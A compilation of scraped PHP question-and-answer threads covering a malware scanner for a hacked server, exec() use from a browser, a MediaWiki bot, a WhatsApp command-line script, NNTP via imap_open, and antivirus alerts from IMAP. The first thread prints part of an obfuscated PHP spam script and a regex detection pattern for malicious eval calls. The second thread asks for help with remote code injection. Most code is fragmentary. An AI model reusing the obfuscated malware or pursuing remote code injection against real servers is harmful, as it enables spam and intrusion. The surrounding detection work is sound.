Finding spammer script on the linux server using php (regex) - php

My linux server has recently got hacked and there is a script running on my server send spam email which I want to find the generator of it and remove it this way.
I've created a php Code to search through all directories for the exact pattern and alert me, it could find the pattern by using of the pregmatch fucntion. but I can't figure out the right regex for pregmatch command to find for example below pattern :
My Code :
class ScanFiles {
public $infected_files = array();
private $scanned_files = array();
function __construct() {
function scan($dir) {
$this->scanned_files[] = $dir;
$files = scandir($dir);
if(!is_array($files)) {
throw new Exception('Unable to scan directory ' . $dir . '. Please make sure proper permissions have been set.');
foreach($files as $file) {
if(is_file($dir.'/'.$file) && !in_array($dir.'/'.$file,$this->scanned_files)) {
} elseif(is_dir($dir.'/'.$file) && substr($file,0,1) != '.') {
function check($contents,$file) {
$this->scanned_files[] = $file;
if(preg_match('/eval\((base64|eval|\$_|\$\$|\$[A-Za-z_0-9\{]*(\(|\{|\[))/i',$contents) || preg_match('/\${"\x47\x4c\x4fB\x41\x4c\x53"}["\x67i\x65q\x68\x6ai\x79e\x6a\x72g"]\b/i',$contents)) {
$this->infected_files[] = $file;
function sendalert() {
if(count($this->infected_files) != 0) {
$message = "== MALICIOUS CODE FOUND == \n\n";
$message .= "The following files appear to be infected: \n";
foreach($this->infected_files as $inf) {
$message .= " - $inf \n";
mail(SEND_EMAIL_ALERTS_TO,'Malicious Code Found!',$message,'FROM:');
echo "Malicious Code Found! : ".$message;
echo "No Malicious Found.";
Spam Script which I found it manually but it make copies on the server with new file names :
<?php ${"\x47\x4c\x4fB\x41\x4c\x53"}["\x67i\x65q\x68\x6ai\x79e\x6a\x72g"]="\x75\x72\x69";
${${"\x47\x4cO\x42\x41\x4c\x53"}["\x6c\x76g\x66\x6f\x63\x74x"]}=stream_context_create(Array("\x68ttp"=>Array("m\x65\x74\x68\x6f\x64"=>"\x50OS\x54","he\x61\x64\x65\x72"=>"Con\x74en\x74-t\x79\x70e: app\x6c\x69\x63\x61\x74i\x6fn/\x78-\x77\x77w-\x66o\x72m-u\x72\x6c\x65\x6e\x63\x6f\x64\x65d","co\x6et\x65n\x74"=>http_build_query(${$whumtbg}))));
header("\x43o\x6et\x65nt-\x44i\x73\x70\x6f\x73\x69tio\x6e: a\x74\x74\x61\x63h\x6dent\x3b fi\x6ce\x6ea\x6d\x65=".${${"\x47\x4c\x4f\x42A\x4c\x53"}["h\x70vg\x74\x67\x62wq"]});
header("\x43\x6fntent-\x4ce\x6eg\x74h: ".strlen(${${"\x47\x4c\x4f\x42\x41\x4cS"}["\x6a\x67\x67\x70\x6cm\x66\x6a\x71\x75p"]}));
function get_ip(){${${"\x47\x4cO\x42\x41L\x53"}["r\x68t\x61\x78\x76\x63"]}=array("\x48T\x54P\x5f\x43\x46_\x43O\x4eN\x45\x43\x54\x49\x4eG\x5f\x49P","\x48T\x54P\x5fCLIENT_\x49P","\x48\x54TP_\x58\x5f\x46\x4f\x52\x57\x41\x52D\x45D_F\x4fR","\x48TTP_\x58\x5f\x46O\x52\x57A\x52D\x45\x44","\x48TTP_\x58_\x43\x4cU\x53T\x45R_\x43L\x49\x45N\x54\x5f\x49P","\x48TTP_F\x4fRWAR\x44E\x44\x5f\x46\x4fR","\x48TTP\x5fFORWA\x52\x44ED","RE\x4dO\x54E_\x41\x44D\x52");
foreach(${${"G\x4cOB\x41\x4c\x53"}["\x72\x68\x74\x61\x78\x76\x63"]} as${${"G\x4c\x4f\x42\x41L\x53"}["\x77\x76\x78t\x79h\x6c"]}){$xfdiqu="\x6b\x65\x79";
return trim(${$kvytrcc});
}function error_404(){${"GL\x4fB\x41\x4cS"}["\x62x\x74fbg\x6f"]="\x75\x72i";

I've Used another method to search for this pattern using grep command and I've managed to find the spam code generator .


call the exec() php function in the web browser

I have a php function called getServerAddres() and I am trying to execute the exec() from the web browser. I understand this is not the proper way of using the function, I was just a task to exploit a web server using remote code injection. Any help on how to do remote code injection using the exec() through the web browser would be greatly appreciated.
Lets say the login in screen is: https://www.
function getServerAddress() {
else {
// Running CLI
if(stristr(PHP_OS, 'WIN')) {
// Rather hacky way to handle windows servers
exec('ipconfig /all', $catch);
foreach($catch as $line) {
if(eregi('IP Address', $line)) {
// Have seen exec return "multi-line" content, so another hack.
if(count($lineCount = split(':', $line)) == 1) {
list($t, $ip) = split(':', $line);
$ip = trim($ip);
} else {
$parts = explode('IP Address', $line);
$parts = explode('Subnet Mask', $parts[1]);
$parts = explode(': ', $parts[0]);
$ip = trim($parts[1]);
if(ip2long($ip > 0)) {
echo 'IP is '.$ip."\n";
return $ip;
} else
; // to-do: Handle this failure condition.
} else {
$ifconfig = shell_exec('/sbin/ifconfig eth0');
preg_match('/addr:([\d\.]+)/', $ifconfig, $match);
return $match[1];
The php script came from the login.php file.
You dont seem to understand the exec function....
First thing, read the documentation here.
This function gets executed on the server side, and thus cannot be executed on the client side.
If what you want is the information of the host machine, then you can run the command there, and output the result.
Create this file: example.php, and enter this code:
echo exec('whoami');
Now, upload this file to the host, and make a request:
And read the result

How to create a page periodically using wiki bot

My prime aim is to get a page , parse the text and create a subpage periodically depending on the text. To get a page ,create and login, i have the following code .Php version-5.3.3,server:localhost
private function login($username, $password, $wiki) {
$response = $this->postAPI($wiki, 'api.php?', 'action=login&lgname=' . urlencode($username) . '&lgpassword=' . urlencode($password));
if ($response['login']['result'] == "Success") {
//Unpatched server, all done
} elseif ($response['login']['result'] == "NeedToken") {
//Patched server, going fine
$token = $response['login']['token'];
$newresponse = $this->postAPI($wiki, 'api.php?', 'action=login&lgname=' . urlencode($username) . '&lgpassword=' . urlencode($password) . '&lgtoken=' . $token);
if ($newresponse['login']['result'] == "Success") {
//All done
} else {
echo "Forced by server to wait. Automatically trying again.<br />\n";
$this->login($username, $password, $wiki);
} else {
if (isset($response['login']['wait']) || (isset($response['error']['code']) && $response['error']['code'] == "maxlag")) {
echo "Forced by server to wait. Automatically trying again.<br />\n";
$this->login($username, $password, $wiki);
} else {
die("Login failed: " . $response . "\r<br />\n");
Function to get a page is:
public function get_page($page, $wiki = "")//get page's content
$response = $this->callAPI($wiki, 'api.php?action=query&prop=revisions&titles=' . urlencode($page) . '&rvprop=content');
if (is_array($response)) {
$array = $response['query']['pages'];
$array = array_shift($array);
$pageid = $array["pageid"];
return $response['query']['pages'][$pageid]['revisions'][0]["*"];
} else {
echo "Unknown get_page error.<br />\n";
return false;
I have a problem with login. I always get Forced by server to wait. Automatically trying again regardless my password and id is correct. Infact the URI works properly if given manually.And if i try to create a page or get a category, i get the following error:
Cannot modify header information - headers already sent by (output started at serverlocation/Phpwikibot.php:188) in serverlocation/includes/WebResponse.php
Can some one help me with this issue?
You say "localhost", so you have server-side access and you should be using the internal PHP API, not the web API. In particular, to edit a page you can use maintenance/edit.php. See a real world example I used for some Wikimedia wikis:
# Stuff
# Fetch stuff
echo -e $stuff
} | php edit.php --user "FuzzyBot" \
--bot --summary "Update stats" "Meta:Babylon/Translation_stats"

How to mimic a command line run with arguements inside a PHP script?

How can you mimic a command line run of a script with arguements inside a PHP script? Or is that not possible?
In other words, let's say you have the following script:
require "../src/php/whatsprot.class.php";
function fgets_u($pStdn) {
$pArr = array($pStdn);
if (false === ($num_changed_streams = stream_select($pArr, $write = NULL, $except = NULL, 0))) {
print("\$ 001 Socket Error : UNABLE TO WATCH STDIN.\n");
return FALSE;
} elseif ($num_changed_streams > 0) {
return trim(fgets($pStdn, 1024));
$nickname = "WhatsAPI Test";
$sender = ""; // Mobile number with country code (but without + or 00)
$imei = ""; // MAC Address for iOS IMEI for other platform (Android/etc)
$countrycode = substr($sender, 0, 2);
$phonenumber=substr($sender, 2);
if ($argc < 2) {
echo "USAGE: ".$_SERVER['argv'][0]." [-l] [-s <phone> <message>] [-i <phone>]\n";
echo "\tphone: full number including country code, without '+' or '00'\n";
echo "\t-s: send message\n";
echo "\t-l: listen for new messages\n";
echo "\t-i: interactive conversation with <phone>\n";
$msg = "";
for ($i=3; $i<$argc; $i++) {
$msg .= $_SERVER['argv'][$i]." ";
echo "[] Logging in as '$nickname' ($sender)\n";
$wa = new WhatsProt($sender, $imei, $nickname, true);
$url = "".$countrycode."&in=".$phonenumber."&udid=".$wa->encryptPassword();
$content = file_get_contents($url);
if(stristr($content,'status="ok"') === false){
echo "Wrong Password\n";
if ($_SERVER['argv'][1] == "-i") {
echo "\n[] Interactive conversation with $dst:\n";
while(TRUE) {
$buff = $wa->GetMessages();
$line = fgets_u(STDIN);
if ($line != "") {
if (strrchr($line, " ")) {
// needs PHP >= 5.3.0
$command = trim(strstr($line, ' ', TRUE));
} else {
$command = $line;
switch ($command) {
case "/query":
$dst = trim(strstr($line, ' ', FALSE));
echo "[] Interactive conversation with $dst:\n";
case "/accountinfo":
echo "[] Account Info: ";
case "/lastseen":
echo "[] Request last seen $dst: ";
echo "[] Send message to $dst: $line\n";
$wa->Message(time()."-1", $dst , $line);
if ($_SERVER['argv'][1] == "-l") {
echo "\n[] Listen mode:\n";
while (TRUE) {
$data = $wa->GetMessages();
if(!empty($data)) print_r($data);
echo "\n[] Request last seen $dst: ";
echo "\n[] Send message to $dst: $msg\n";
$wa->Message(time()."-1", $dst , $msg);
echo "\n";
To run this script, you are meant to go to the Command Line, down to the directory the file is in, and then type in something like php -s "whatsapp.php" "Number" "Message".
But what if I wanted to bypass the Command Line altogether and do that directly inside the script so that I can run it at any time from my Web Server, how would I do that?
First off, you should be using getopt.
In PHP it supports both short and long formats.
Usage demos are documented at the page I've linked to. In your case, I suspect you'll have difficulty detecting whether a <message> was included as your -s tag's second parameter. It will probably be easier to make the message a parameter for its own option.
$options = getopt("ls:m:i:");
if (isset($options["s"] && !isset($options["m"])) {
die("-s needs -m");
As for running things from a web server ... well, you pass variables to a command line PHP script using getopt() and $argv, but you pass variables from a web server using $_GET and $_POST. If you can figure out a sensible way to map $_GET variables your command line options, you should be good to go.
Note that a variety of other considerations exist when taking a command line script and running it through a web server. Permission and security go hand in hand, usually as inverse functions of each other. That is, if you open up permissions so that it's allowed to do what it needs, you may expose or even create vulnerabilities on your server. I don't recommend you do this unless you'll more experienced, or you don't mind if things break or get attacked by script kiddies out to 0wn your server.
You're looking for backticks, see
Or you can use shell_exec()

PHP and NNTP problems using imap_open

I am having a bit of trouble with NNTP and PHP (following the directions in the PHP manual, I threw in this quick test:
$server = "{}";
if ($nntp = imap_open($server,"myuser","mypass", OP_HALFOPEN)) {
echo "Connected...\n";
$list = imap_list($nntp, "{}", "*");
if (is_array($list)) {
foreach ($list as $val) {
echo imap_utf7_decode($val) . "\n";
} else {
echo "No groups found...\n";
} else {
echo "Unable to connect...\n";
When I run this script I get:
No groups found...
Any suggestions would be most appreciated. I am connecting to a valid server with a valid username and password. I am also aware of the Net_NNTP PEAR library, but I am at this point not interested in using that rather I just want to use whats 'build_in'ish to php.
Have you tried changing
$list = imap_list($nntp, "{}", "*");
$list = imap_list($nntp, $server, "*");
This worked when connecting to my newsserver.

Using PHP's IMAP library triggers Kaspersky's Antivirus

I just started today working with PHP's IMAP library, and while imap_fetchbody or imap_body are called, it is triggering my Kaspersky antivirus. The viruses are Trojan.Win32.Agent.dmyq and Trojan.Win32.FraudPack.aoda. I am running this off a local development machine with XAMPP and Kaspersky AV.
Now, I am sure there are viruses there since there is spam in the box (who doesn't need a some viagra or vicodin these days?). And I know that since the raw body includes attachments and different mime-types, bad stuff can be in the body.
So my question is: are there any risks using these libraries?
I am assuming that the IMAP functions are retrieving the body, caching it to disk/memory and the AV scanning it sees the data.
Is that correct? Are there any known security concerns using this library (I couldn't find any)? Does it clean up cached message parts perfectly or might viral files be sitting somewhere?
Is there a better way to get plain text out of the body than this? Right now I am using the following code (credit to Kevin Steffer):
function get_mime_type(&$structure) {
$primary_mime_type = array("TEXT", "MULTIPART","MESSAGE", "APPLICATION", "AUDIO","IMAGE", "VIDEO", "OTHER");
if($structure->subtype) {
return $primary_mime_type[(int) $structure->type] . '/' .$structure->subtype;
return "TEXT/PLAIN";
function get_part($stream, $msg_number, $mime_type, $structure = false, $part_number = false) {
if(!$structure) {
$structure = imap_fetchstructure($stream, $msg_number);
if($structure) {
if($mime_type == get_mime_type($structure)) {
if(!$part_number) {
$part_number = "1";
$text = imap_fetchbody($stream, $msg_number, $part_number);
if($structure->encoding == 3) {
return imap_base64($text);
} else if($structure->encoding == 4) {
return imap_qprint($text);
} else {
return $text;
if($structure->type == 1) /* multipart */ {
while(list($index, $sub_structure) = each($structure->parts)) {
if($part_number) {
$prefix = $part_number . '.';
$data = get_part($stream, $msg_number, $mime_type, $sub_structure,$prefix . ($index + 1));
if($data) {
return $data;
return false;
$connection = imap_open($server, $login, $password);
$count = imap_num_msg($connection);
for($i = 1; $i <= $count; $i++) {
$header = imap_headerinfo($connection, $i);
$from = $header->fromaddress;
$to = $header->toaddress;
$subject = $header->subject;
$date = $header->date;
$body = get_part($connection, $i, "TEXT/PLAIN");
Your guess seems accurate. IMAP itself is fine. What you do with the contents is what's dangerous.
What's dangerous about virus e-mails is that users might open a .exe attachment or something, so bad attachments and potentially evil HTML are what's being checked. As long as your code handling attachments doesn't tell the user to open them and this is just automatic processing or whatever, you're good to go. If you're planning on outputting HTML contents, be sure to use something like HTML Purifier.
The AV is detecting these signatures as they pass through the networking stack, most likely. You should be able to tell the source of the detection from the messages Kaspersky is giving you.
